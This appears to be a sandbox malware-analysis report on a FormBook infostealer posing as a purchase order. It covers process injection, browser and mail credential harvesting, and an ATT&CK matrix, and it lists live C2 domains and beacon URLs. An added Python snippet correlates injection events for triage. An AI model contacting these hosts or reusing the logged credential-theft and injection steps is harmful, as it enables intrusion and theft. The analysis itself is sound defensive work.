Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | Process created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"
Source: C:\Windows\SysWOW64\sdiagnhost.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
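The rows from "Memory written" through "Process created" are the per-event evidence behind the injection signatures in the report header: a PE image (the 4D5A "MZ" header) written to the default image base 0x400000 of a child that is a copy of the sample, sections mapped into sdiagnhost.exe and firefox.exe with execute-read-write protection, a thread context overwritten and an APC queued in another process. Any one of these rows is weak on its own; what carries the verdict is that several land on the same source and target pair. The correlator below is an added example rather than report tooling: it parses rows written as "Source: <process> | <action>: <detail>", groups the hollowing-style indicators per (source, target) pair and reports pairs that accumulate three or more. The sample rows use hypothetical process names and are constructed for the demonstration; where the report names a target by PID (as in "target process: 6308"), the same string is kept as the key and would need a PID-to-image map to join with the path-keyed rows.

```python
"""Correlate sandbox behaviour rows into per-target process-injection chains.

Added example, not Joe Sandbox tooling. Rows are expected in the shape
"Source: <process> | <action>: <detail>", one event per line.
"""
import re
from collections import defaultdict

ROW = re.compile(r"^Source: (?P<src>.+?) \| (?P<action>[^:|]+): (?P<detail>.*)$")

# Per action: a pattern that pulls the target process out of the detail column
# and only matches the variant that is an injection indicator (an MZ header
# written, an RWX mapping, a context overwrite, an APC, a child process).
INDICATORS = {
    "Process created": (re.compile(r"^(?P<target>.+?\.exe)", re.IGNORECASE), "child process created"),
    "Memory written": (re.compile(r"^(?P<target>.+?) base: [0-9A-Fa-f]+ value starts with: 4D5A"),
                       "MZ header written"),
    "Section loaded": (re.compile(r"^NULL target: (?P<target>.+?) protection: execute and read and write$"),
                       "RWX section mapped"),
    "Thread register set": (re.compile(r"^target process: (?P<target>.+)$"), "thread context set"),
    "Thread APC queued": (re.compile(r"^target process: (?P<target>.+)$"), "APC queued"),
}


def injection_chains(rows, min_indicators=3):
    """Map (source, target) -> sorted indicator labels for pairs with enough evidence."""
    chains = defaultdict(set)
    for row in rows:
        m = ROW.match(row.strip())
        if not m or m["action"] not in INDICATORS:
            continue
        pattern, label = INDICATORS[m["action"]]
        d = pattern.match(m["detail"])
        if d:
            chains[(m["src"], d["target"])].add(label)
    return {pair: sorted(labels) for pair, labels in chains.items() if len(labels) >= min_indicators}


def describe(chains):
    """One line per flagged pair, for a triage note."""
    return [f"{src} -> {dst}: {', '.join(labels)}" for (src, dst), labels in sorted(chains.items())]


# Constructed sample rows with hypothetical process names (not the sample's real ones).
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\dropper.exe | Process created: C:\Users\user\Desktop\dropper.exe "
    r'"C:\Users\user\Desktop\dropper.exe"',
    r"Source: C:\Users\user\Desktop\dropper.exe | Memory written: C:\Users\user\Desktop\dropper.exe "
    r"base: 400000 value starts with: 4D5A",
    r"Source: C:\Users\user\Desktop\dropper.exe | Thread register set: target process: C:\Users\user\Desktop\dropper.exe",
    r"Source: C:\Windows\SysWOW64\host.exe | Section loaded: NULL target: C:\Program Files\Browser\browser.exe "
    r"protection: read write",
    r"Source: C:\Windows\SysWOW64\host.exe | Section loaded: NULL target: C:\Program Files\Browser\browser.exe "
    r"protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\host.exe | Thread APC queued: target process: C:\Program Files\Browser\browser.exe",
    r"Source: C:\Windows\SysWOW64\host.exe | Process created: C:\Program Files\Browser\browser.exe "
    r'"C:\Program Files\Browser\browser.exe"',
    r"Source: C:\Windows\SysWOW64\host.exe | Section loaded: NULL target: C:\Windows\SysWOW64\other.exe "
    r"protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\host.exe | Queries volume information: C:\Windows\Fonts\micross.ttf",
]

if __name__ == "__main__":
    for line in describe(injection_chains(SAMPLE_ROWS)):
        print(line)
```

The threshold of three is a triage choice, not a fixed rule: the self-hollowing pair (child created, MZ written at the image base, thread context set) and the section-mapping pair (RWX map, APC, child created) both clear it, while a lone RWX mapping into a third process does not and stays below the line until more rows arrive.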
Source: sKyuoUfZdk.exe, 00000008.00000000.2506681823.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, sKyuoUfZdk.exe, 00000008.00000002.3899191014.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000000.2657737477.0000000001921000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: sKyuoUfZdk.exe, 00000008.00000000.2506681823.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, sKyuoUfZdk.exe, 00000008.00000002.3899191014.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000000.2657737477.0000000001921000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: sKyuoUfZdk.exe, 00000008.00000000.2506681823.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, sKyuoUfZdk.exe, 00000008.00000002.3899191014.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000000.2657737477.0000000001921000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: sKyuoUfZdk.exe, 00000008.00000000.2506681823.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, sKyuoUfZdk.exe, 00000008.00000002.3899191014.0000000000F51000.00000002.00000001.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000000.2657737477.0000000001921000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\PO 20495088.exe | Queries volume information: C:\Users\user\Desktop\PO 20495088.exe VolumeInformation
Source: C:\Users\user\Desktop\PO 20495088.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\PO 20495088.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\PO 20495088.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\PO 20495088.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\PO 20495088.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 6.2.PO 20495088.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.PO 20495088.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.3899502579.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2584046545.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3899442496.0000000004100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3899309709.0000000001490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2585431955.0000000003940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3899421488.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\sdiagnhost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\sdiagnhost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\sdiagnhost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\sdiagnhost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\sdiagnhost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\sdiagnhost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\sdiagnhost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\sdiagnhost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\sdiagnhost.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match | File source: 6.2.PO 20495088.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.PO 20495088.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.3899502579.0000000004150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2584046545.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3899442496.0000000004100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3899309709.0000000001490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2585431955.0000000003940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3899421488.0000000004350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (one column per tactic; a number in parentheses is the count of matched signatures for that technique, cells without a number were not matched)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | DLL Side-Loading (1) | Process Injection (412) | Masquerading (1) | OS Credential Dumping (1) | Security Software Discovery (121) | Remote Services | Email Collection (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Abuse Elevation Control Mechanism (1) | Disable or Modify Tools (11) | LSASS Memory | Process Discovery (2) | Remote Desktop Protocol | Archive Collected Data (1) | Ingress Tool Transfer (3) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (41) | Security Account Manager | Virtualization/Sandbox Evasion (41) | SMB/Windows Admin Shares | Data from Local System (1) | Non-Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (412) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (4) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | File and Directory Discovery (2) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Abuse Elevation Control Mechanism (1) | Cached Domain Credentials | System Information Discovery (113) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Obfuscated Files or Information (4) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Software Packing (12) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | DLL Side-Loading (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1557623 | Sample: PO 20495088.exe | Start date: 18/11/2024 | Architecture: WINDOWS | Score: 100

Start (node 2)
  DNS/IP: www.urssaf.pro; www.tenmyk.shop; 8 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 6 other signatures
  -> PO 20495088.exe 4 (node 10), started
     Dropped file: C:\Users\user\AppData\...\PO 20495088.exe.log, ASCII
     Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
     -> PO 20495088.exe (node 14), started
        Signatures: Maps a DLL or memory area into another process
        -> sKyuoUfZdk.exe (node 19), injected
           Signatures: Found direct / indirect Syscall (likely to bypass EDR)
           -> sdiagnhost.exe 13 (node 24), started
              Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
              -> sKyuoUfZdk.exe (node 27), injected
                 DNS/IP: www.inspires.website 203.161.49.193, ports 49999, 50000, 50001, VNPT-AS-VNVNPTCorpVN Malaysia; www.isirumah.info 15.197.204.56, ports 50007, 50008, 50009, TANDEMUS United States; 7 other IPs or domains
                 Signatures: Found direct / indirect Syscall (likely to bypass EDR)
              -> firefox.exe (node 31), started
     -> powershell.exe 23 (node 17), started
        Signatures: Loading BitLocker PowerShell Module
        -> conhost.exe (node 22), started

Source | Detection | Scanner | Label | Link
PO 20495088.exe | 39% | ReversingLabs | ByteCode-MSIL.Trojan.Genie8DN
PO 20495088.exe | 100% | Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.fedegaritech.online/USC_University_Affiliated_Program.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZ | 0% | Avira URL Cloud | safe
http://www.fedegaritech.online/__media__/design/underconstructionnotice.php?d=fedegaritech.online | 0% | Avira URL Cloud | safe
http://www.fedegaritech.online/Feeds.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8rtVBcj5MV0FSaN5 | 0% | Avira URL Cloud | safe
http://www.inspires.website/tv3i/?3Vh=owqNhS77mKpyFubSJ5A9QVznt18Efvf/o4h2nqBSdp8yXNsKj6uoPtg3kRvBj/pxRtAtOgnrofTovjHhINZ0xj2/y7I6W0FrsduvE6GCulNhl0GmpxyNmPQFElMITGXJFg==&GLvL=i6ILStp | 0% | Avira URL Cloud | safe
http://www.tenmyk.shop/qpp1/?GLvL=i6ILStp&3Vh=bNhe/DfYfogjOpkpwqpXjWD1WogAMITw7j9LK8VbiMrdvIszvqUx6yAB8LB2RXagyWSWfU/4R7sLqUv3mikd+VKtTD0iq8ysmv62W+FV5QchVtAtbmjy/m1Chp+ytcm09A== | 0% | Avira URL Cloud | safe
http://www.inspires.website/tv3i/ | 0% | Avira URL Cloud | safe
http://www.fedegaritech.online/Green_Foods_Benefits.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8 | 0% | Avira URL Cloud | safe
http://www.livelovechat.live/pd34/?GLvL=i6ILStp&3Vh=K7c7GG4YoBhyIH2FkZv47jvyXIQu7BF3gr9nfk9bshiJsGEWrwQzORTrdncggfezCYBzamNCDbDGvy7dK0Wg3s8vNv6rtr8S8iFqSDmB+QkqQHbk31GwTFmydpKFayxrIg== | 0% | Avira URL Cloud | safe
http://www.fedegaritech.online/__media__/js/trademark.php?d=fedegaritech.online&type=ns | 0% | Avira URL Cloud | safe
http://www.urssaf.pro/z0cc/?3Vh=mPyo6D+wxSg6wqdV9nk/OSYqhM94LpUyTCqRRij/kapmOQ+LaukUhnJqBEfRM/o2CL136rw3QccrDBsmMWKXgAkLupEcDtZ658id8aig7ErI/LfAFvSz4HSXFzvHaTHHWA==&GLvL=i6ILStp | 0% | Avira URL Cloud | safe
http://www.isirumah.info/guxl/ | 0% | Avira URL Cloud | safe
http://www.fedegaritech.online/sxrn/ | 0% | Avira URL Cloud | safe
http://www.fedegaritech.online/Cerebral_Palsy_Types.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8 | 0% | Avira URL Cloud | safe
http://www.Fedegaritech.online | 0% | Avira URL Cloud | safe
http://www.ssrnoremt-rise.sbs/3jsc/ | 0% | Avira URL Cloud | safe
http://www.ssrnoremt-rise.sbs | 0% | Avira URL Cloud | safe
http://www.fedegaritech.online/Fodder.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8rtVBcj5MV0FSaN | 0% | Avira URL Cloud | safe
http://www.urssaf.pro/z0cc/ | 0% | Avira URL Cloud | safe
https://tenmyk.shop/qpp1/?GLvL=i6ILStp&3Vh=bNhe/DfYfogjOpkpwqpXjWD1WogAMITw7j9LK8VbiMrdvIszvqUx6yAB8 | 0% | Avira URL Cloud | safe
http://www.livelovechat.live/pd34/ | 0% | Avira URL Cloud | safe
http://www.newegg.club/z6yq/ | 0% | Avira URL Cloud | safe
http://www.tenmyk.shop/qpp1/ | 0% | Avira URL Cloud | safe
http://www.fedegaritech.online/sxrn/?3Vh=70g3synrMt+mv3bMA5M2pxuaxfXYXBcuz2rDMeB4YhlIhpmz1+c2ZYK3A+er04ehZbUUhJrT7mt7qDpgqvLlNMW5io5Y2wz+3pIWYjAXlaRVZqa6aRI+hdIryUt+yvXWOw==&GLvL=i6ILStp | 0% | Avira URL Cloud | safe
http://www.newegg.club/z6yq/?GLvL=i6ILStp&3Vh=IJnefPGbAG2krK+EKqL7a6PcsOn2aPK/WZ9HL1Dz7m/jpK3dV9N7lfXoIgTZBqqJT6Dwk+2xUIDeSWpocJA6c4hKTPFrc23hpH01F3StVZ8qYYY4ti7AYH4NQlXIhw0jjg== | 0% | Avira URL Cloud | safe
http://www.isirumah.info/guxl/?3Vh=VQ+MI0uxyUC67v7v1hceC1mX3dJlk0riHoAQ+3GvHNeFtXUu+z+ARRpD7cmGrTRyz64SdCAtvJHCLetkGUIMOH+WZ0Kd1BdS1tdCvwc6ShNqDahWH5yyFSR4U8rJOhuL/g==&GLvL=i6ILStp | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.habitat.rent | 13.248.169.48 | true | true | | unknown
www.newegg.club | 149.115.238.44 | true | true | | unknown
www.fedegaritech.online | 208.91.197.27 | true | true | | unknown
www.tenmyk.shop | 104.21.74.79 | true | true | | unknown
livelovechat.live | 3.33.130.190 | true | true | | unknown
www.ssrnoremt-rise.sbs | 188.114.97.3 | true | true | | unknown
www.urssaf.pro | 75.2.103.23 | true | true | | unknown
www.inspires.website | 203.161.49.193 | true | true | | unknown
www.isirumah.info | 15.197.204.56 | true | true | | unknown
www.livelovechat.live | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.inspires.website/tv3i/ | true | Avira URL Cloud: safe | unknown
http://www.livelovechat.live/pd34/?GLvL=i6ILStp&3Vh=K7c7GG4YoBhyIH2FkZv47jvyXIQu7BF3gr9nfk9bshiJsGEWrwQzORTrdncggfezCYBzamNCDbDGvy7dK0Wg3s8vNv6rtr8S8iFqSDmB+QkqQHbk31GwTFmydpKFayxrIg== | true | Avira URL Cloud: safe | unknown
http://www.inspires.website/tv3i/?3Vh=owqNhS77mKpyFubSJ5A9QVznt18Efvf/o4h2nqBSdp8yXNsKj6uoPtg3kRvBj/pxRtAtOgnrofTovjHhINZ0xj2/y7I6W0FrsduvE6GCulNhl0GmpxyNmPQFElMITGXJFg==&GLvL=i6ILStp | true | Avira URL Cloud: safe | unknown
http://www.tenmyk.shop/qpp1/?GLvL=i6ILStp&3Vh=bNhe/DfYfogjOpkpwqpXjWD1WogAMITw7j9LK8VbiMrdvIszvqUx6yAB8LB2RXagyWSWfU/4R7sLqUv3mikd+VKtTD0iq8ysmv62W+FV5QchVtAtbmjy/m1Chp+ytcm09A== | true | Avira URL Cloud: safe | unknown
http://www.urssaf.pro/z0cc/?3Vh=mPyo6D+wxSg6wqdV9nk/OSYqhM94LpUyTCqRRij/kapmOQ+LaukUhnJqBEfRM/o2CL136rw3QccrDBsmMWKXgAkLupEcDtZ658id8aig7ErI/LfAFvSz4HSXFzvHaTHHWA==&GLvL=i6ILStp | true | Avira URL Cloud: safe | unknown
http://www.isirumah.info/guxl/ | true | Avira URL Cloud: safe | unknown
http://www.ssrnoremt-rise.sbs/3jsc/ | true | Avira URL Cloud: safe | unknown
http://www.urssaf.pro/z0cc/ | true | Avira URL Cloud: safe | unknown
http://www.livelovechat.live/pd34/ | true | Avira URL Cloud: safe | unknown
http://www.fedegaritech.online/sxrn/ | true | Avira URL Cloud: safe | unknown
http://www.newegg.club/z6yq/ | true | Avira URL Cloud: safe | unknown
